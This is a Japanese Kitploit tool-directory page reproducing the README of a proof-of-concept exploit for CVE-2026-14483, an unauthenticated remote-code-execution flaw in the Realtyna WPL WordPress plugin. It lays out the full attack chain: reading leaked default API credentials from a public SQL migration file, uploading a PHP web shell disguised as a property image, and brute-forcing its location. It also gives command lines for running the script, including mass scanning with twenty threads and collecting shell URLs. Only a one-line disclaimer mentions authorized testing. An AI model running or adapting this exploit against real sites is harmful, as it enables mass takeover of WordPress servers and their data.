Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-14483 — CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS | Kitploit
ツール/GitHubGitHub/madexploits/cve-2026-14483
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストペイロード開発
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS

リポジトリを見る
121ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-14483 — WPL Real Estate RCE

WordPressプラグイン Realtyna WPL Real Estate Listing に対する未認証のリモートコード実行。

ツールをダウンロード
フィールド詳細
CVECVE-2026-14483
影響を受けるバージョン<= 5.2.0
プラグインreal-estate-listing-realtyna-wpl
影響未認証のPHPウェブシェルアップロード(RCE)
スクリプトCVE-2026-14483.py
作者MADEXPLOITS

デフォルトでは、このスクリプトはWPL 5.2.0 を実行しているターゲットのみを攻撃します。上書きするには --force を使用してください。

画像


脆弱性の概要

  1. 認証情報の漏洩 — デフォルトの api_key / api_secret が、公開されたSQLマイグレーションダンプを介して露出しています。
  2. 未認証のアップロード — これらの認証情報はWPL I/O API(set_property)を認証し、細工されたPHPファイルを物件画像としてアップロードできるようにします。
  3. ウェブシェルの発見 — アップロードされたシェルは wp-content/uploads/WPL/{property_id}/ 配下に配置されます。

必要条件

root@kitploit:~
pip install requests colorama
  • Python 3.8+
  • ターゲットへのネットワークアクセス

使用方法

ターゲットリスト

1行に1つのベースURLを記述したテキストファイルを作成します:

root@kitploit:~
http://wplab.test
https://example.com

基本的な実行

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt

成功したシェルのURLは result.txt(または --output)に追記されます。

全オプション

root@kitploit:~
python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force
引数デフォルト説明
--targets(必須)ベースURLを含むファイル(1行につき1つ)
--outputresult.txt見つかったシェルURLを追記するファイル
--user-id1新しい物件を所有するWordPress / WPLユーザーID
--payload組み込みのアップロードシェルカスタムPHPペイロード文字列
--max-id1000シェルの場所を特定する際にブルートフォースする物件IDの最大値
--timeout30HTTPタイムアウト(秒)
--threads5同時実行するワーカースレッド数
--debugオフ詳細なデバッグログ出力
--forceオフバージョンが5.2.0以外、またはバージョンを検出できない場合でも攻撃を実行

攻撃の流れ

root@kitploit:~
Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

デフォルトのシェルマーカー: MADEXPLOITS
デフォルトのリモートファイル名: 0x89MADEXPLOITS.php


使用例

単一のラボターゲット(このワークスペース):

root@kitploit:~
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

より高い同時実行数でのマススキャン:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

バージョンチェックが失敗した場合に攻撃を強制:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --force

出力

root@kitploit:~
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

result.txt には1行につき1つのシェルURLが含まれます。


注意事項

  • バージョンはプラグイン readme.txt 内の Stable tag: / Version: から読み取られ、フォールバックとして wpl.php が使用されます。
  • アップロード後にシェルが見つからない場合は、--max-id を引き上げてください。
  • 認可されたセキュリティテスト / ローカルラボでの使用のみを目的としています。